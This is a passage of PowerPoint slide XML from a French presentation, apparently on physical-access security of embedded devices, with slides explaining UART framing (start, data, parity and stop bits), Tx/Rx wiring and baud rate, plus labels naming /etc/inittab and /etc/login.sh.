                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inittab</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="ZoneTexte 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9032CEF7-5D6B-B81D-6759-A504B14870DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269215" y="2594901"/>
            <a:ext cx="2267744" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/etc/login.sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Image 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E37D1CFE-DAC1-BDF3-A851-4F9991F5CE18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="412582" y="2883722"/>
            <a:ext cx="8428447" cy="1938145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Image 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0B3042-AD34-C739-FDA9-B70CB70A6A58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="347810" y="1650469"/>
            <a:ext cx="2809354" cy="785147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Image 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{149DA8E7-57A4-4B5D-C887-2989BF2CC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26" y="1220387"/>
            <a:ext cx="3071469" cy="2476372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EFE1F16-C416-AC64-CD82-6A94CD2E82FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="283954" y="1863656"/>
            <a:ext cx="2887950" cy="178349"/>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3" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{953D0448-83A0-7700-6146-368A76C12FDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697447" y="3803875"/>
            <a:ext cx="8143581" cy="369332"/>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8696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4A4FEA49-1B5B-E713-9A20-441B6E816C4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329977" y="4328762"/>
            <a:ext cx="8448898" cy="376064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Vitesse de transmission ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du numéro de diapositive 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B22FA188-D65B-25D1-052C-29A67B53D050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé de la date 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2842F5B1-232F-7576-A196-B766BC9FD567}"/>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Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B71A24-7758-5542-6518-B15E07316E99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>UART : Universal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Asynchronous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Receiver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Transmitter</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20CD5A97-7759-8AE2-57E7-E36F8AE7F092}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Accès physique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D96514BC-B2F6-E04F-2363-27395B85C423}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>UART</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Connecteur : en angle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09E8D5F3-4CE5-0B9A-E858-2CC4FBBC04AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409421" y="3000346"/>
            <a:ext cx="10909212" cy="974460"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 17608"/>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2AB7D6E-1C56-BE1E-84D8-AC7B24744AFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3922186" y="3003447"/>
            <a:ext cx="792088" cy="9744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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>D1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83F9F7FB-A17A-AFC9-59FA-29BA3DD1A2EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3130098" y="3000346"/>
            <a:ext cx="792088" cy="9702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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>D0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDB831B5-02DE-4246-6EDB-4FFF9D5F9C39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714274" y="3000346"/>
            <a:ext cx="1526307" cy="9702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t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F10751-2A1F-C041-3C33-3B1D6DE7F0AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240581" y="3006032"/>
            <a:ext cx="792088" cy="9744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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Dn</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{953E414D-465A-4405-C5E8-AFE248C7AE32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7032669" y="3000345"/>
            <a:ext cx="792088" cy="9702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latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Parité</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Connecteur droit 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFB90F6E-2028-E951-8AAE-EAC6B3CA68A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7364177" y="3000345"/>
            <a:ext cx="17798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2FFCED09-858E-A6D6-FC6D-2FCCE4981E9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8529150" y="2995364"/>
            <a:ext cx="0" cy="209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0220A44-853A-4089-0637-3198C0807454}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266002" y="3266074"/>
            <a:ext cx="936104" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>start</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="ZoneTexte 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D677DB38-B0D2-F199-B96C-E23BEAB0FDDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7740761" y="3278365"/>
            <a:ext cx="936104" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>stop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB577E58-24AC-AD4D-347F-818C4AAC0962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="257461" y="1289239"/>
            <a:ext cx="4936050" cy="1637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fr-FR" sz="1400" dirty="0"/>
              <a:t>Les données sont émises sous forme de trame :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>Bit de start à 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>Données : 5 à 9 bits ( couramment 7 à 8 bits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>Bit de parité pour vérifier l’intégrité de la trame (optionnel)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>Bit de stop à 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="ZoneTexte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D083098-1630-27C0-2100-2D0DB5FBC1FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="178911" y="2810698"/>
            <a:ext cx="230510" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="ZoneTexte 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80799DA8-DA7F-838E-1FF3-0D7D927E0B04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="178911" y="3765327"/>
            <a:ext cx="230510" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8712D457-5C23-A75E-CF90-E32871E8101E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5985599" y="1300936"/>
            <a:ext cx="792088" cy="4389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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Tx</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EDBC3A2-3DEB-3173-DFCB-CB83D459AE95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5985599" y="1937020"/>
            <a:ext cx="792088" cy="4389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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Rx</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C566246-4763-8217-14A3-9F8FF154F073}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7469108" y="1300936"/>
            <a:ext cx="792088" cy="4389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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Tx</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AABEE72-BEB1-AF82-3ECF-58FCB90084E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7469108" y="1925067"/>
            <a:ext cx="792088" cy="4389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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Rx</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Connecteur droit avec flèche 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{807F5228-E96C-32DC-C1BD-9F7CA4D7CCFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="3"/>
            <a:endCxn id="29" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6777687" y="1520405"/>
            <a:ext cx="691421" cy="6360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Connecteur droit avec flèche 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A1284D-6390-91EA-A4F1-163C482BF537}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="28" idx="1"/>
            <a:endCxn id="31" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6777687" y="1520405"/>
            <a:ext cx="691421" cy="6241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0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79671A9-71C8-2E1F-C9FC-0178C076BCAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé de la date 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6AB54E5-4C1F-72A4-551D-4BA5CA6CBE93}"/>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Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34BE1BF7-38EC-53E1-6D36-A6EEC4B6513D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Baudrate</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
